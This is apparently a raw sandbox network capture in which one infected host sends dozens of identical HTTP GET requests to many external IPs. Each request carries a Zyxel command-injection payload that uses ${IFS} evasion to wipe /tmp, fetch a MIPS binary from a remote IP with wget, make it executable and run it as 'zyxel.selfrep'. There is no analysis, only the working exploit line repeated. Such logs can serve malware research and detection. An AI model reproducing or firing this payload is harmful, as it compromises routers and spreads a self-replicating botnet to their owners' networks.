                                      Jan 14, 2024 15:50:50.394555092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5277192.168.2.144378012.238.205.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394612074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5278192.168.2.1453464163.234.185.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394659042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5279192.168.2.144550699.205.130.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394712925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5280192.168.2.144181020.218.84.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394771099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5281192.168.2.1434624122.216.199.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394831896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5282192.168.2.144264468.11.18.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394872904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5283192.168.2.1458316182.245.7.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394936085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5284192.168.2.144025495.117.30.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.394999027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5285192.168.2.1439436155.242.162.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395056009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5286192.168.2.1448168115.161.91.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395087957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5287192.168.2.143430658.179.118.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395148993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5288192.168.2.1457782108.141.147.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395216942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5289192.168.2.1434108177.137.149.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395246029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5290192.168.2.143882874.252.101.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395293951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5291192.168.2.1443466116.75.247.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395318031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5292192.168.2.144422645.167.40.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395395994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5293192.168.2.1454344156.117.228.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395452976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5294192.168.2.143655459.14.73.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395500898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5295192.168.2.144172053.244.186.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395560026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5296192.168.2.1444820108.124.112.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395587921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5297192.168.2.1449262194.113.166.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395649910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5298192.168.2.1454544139.46.107.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395708084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5299192.168.2.144352688.176.101.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395766020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5300192.168.2.1457286176.230.246.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395803928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5301192.168.2.1452876108.193.129.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395868063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5302192.168.2.1458058130.65.235.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395911932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5303192.168.2.1436598213.61.43.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.395973921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5304192.168.2.1457272146.220.151.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396011114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5305192.168.2.1446656194.50.159.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396064997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5306192.168.2.1441520217.103.234.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396119118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5307192.168.2.143429882.66.100.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396158934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5308192.168.2.1457948115.51.94.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396230936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5309192.168.2.1458694107.30.133.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396280050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5310192.168.2.1443298206.16.79.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396313906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5311192.168.2.1448296199.72.204.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396383047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5312192.168.2.145564297.136.243.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396440029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5313192.168.2.1438586179.95.95.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396511078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5314192.168.2.1446608205.104.198.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396550894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5315192.168.2.1436626144.218.76.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396610022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5316192.168.2.1439598181.142.111.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396650076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5317192.168.2.14509081.225.144.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396706104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5318192.168.2.144744824.196.254.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396755934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5319192.168.2.1451328137.165.227.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396821976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5320192.168.2.1450272162.7.72.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396861076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5321192.168.2.1434244202.83.109.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396928072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5322192.168.2.144688866.92.120.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.396962881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5323192.168.2.1458208188.207.238.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397032976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5324192.168.2.145754699.16.129.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397079945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5325192.168.2.145338670.77.56.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397129059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5326192.168.2.1436360165.149.29.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397202015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5327192.168.2.1459636113.223.125.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397258043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5328192.168.2.1440190148.210.157.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397325039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5329192.168.2.1443994218.170.76.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397381067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5330192.168.2.145819068.2.156.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397427082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5331192.168.2.1440536185.92.84.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397504091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5332192.168.2.1435372158.79.211.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397540092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5333192.168.2.1448414124.55.105.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397597075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5334192.168.2.1453492199.252.250.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397644043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5335192.168.2.1433634132.55.97.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397710085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5336192.168.2.1454028100.229.182.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397763968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5337192.168.2.1444966188.60.97.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397825956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5338192.168.2.1452420135.156.166.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:50.397877932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5339192.168.2.1446670136.85.187.230443
                                      TimestampBytes transferredDirectionData
